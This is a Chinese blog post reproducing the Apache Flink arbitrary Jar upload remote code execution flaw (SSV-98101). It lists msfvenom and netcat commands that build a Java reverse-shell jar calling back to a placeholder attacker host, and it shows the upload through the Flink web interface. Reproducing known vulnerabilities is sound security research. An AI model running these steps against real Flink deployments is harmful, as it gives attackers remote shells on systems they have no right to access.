Apache Flink任意Jar包上传导致远程代码执行漏洞复现

1C 2019-11-14 PM 574℃ 0条

Apache Flink任意Jar包上传导致远程代码执行漏洞复现

0x00 漏洞描述
近日,有安全研究员公开了一个Apache Flink的任意Jar包上传导致远程代码执行的漏洞。攻击者只需要自己定制一个恶意jar上传，即可达到攻击目的。
0x01 环境搭建
镜像下载地址：
https://www.apache.org/dyn/closer.lua/flink/flink-1.9.1/flink-1.9.1-bin-scala_2.11.tgz
下载解压进入bin文件夹，执行./start-cluster.sh
然后访问http://ip:8081
0x02 漏洞复现
1.使用msfvenom生成jar包

msfvenom -p java/shell_reverse_tcp LHOST=x.x.x.x LPORT=5566 -f jar >shell.jar

2.监听

nc -lvp 5566

3.访问页面并上传shell.jar文件

4.点击submit反弹shell，查看监听成功

标签: Apache, Flink, SSV-98101

非特殊说明，本博所有文章均为博主原创。

如若转载，请注明出处：https://www.bugku.net/archives/92.html

上一篇 Apache Solr Velocity模板远程代码执行复现

下一篇批量获取网站状态码及标题的脚本

评论啦~

2020年8月7号，好长时间没动态了，冒个泡(●'◡'●)2020年08月07日 23:07:45
2019年9月13号，大家中秋节快乐(*^▽^*)2019年09月13日 08:10:04

Solr Hikvision typecho 技术分享 Metasploit-msf CVE-2019-0708 cs PhpStudy SSV-98101 Nmap js CVE-2017-7921 Cobalt Strike 工具 Apache 渗透 Flink CVE-2019-17558 Python

宁采陈的博客 IT老五大叔小白陈小黑博客 Bzero's Blog 这个站有点库

Apache Flink任意Jar包上传导致远程代码执行漏洞复现

Apache Flink任意Jar包上传导致远程代码执行漏洞复现

评论啦~

栏目分类

博主动态 ~

标签云

友情链接申请

Apache Flink任意Jar包上传导致远程代码执行漏洞复现

Apache Flink任意Jar包上传导致远程代码执行漏洞复现

 评论啦~

 栏目分类

博主动态 ~

标签云

友情链接申请

评论啦~

栏目分类

博主动态 ~

标签云

友情链接申请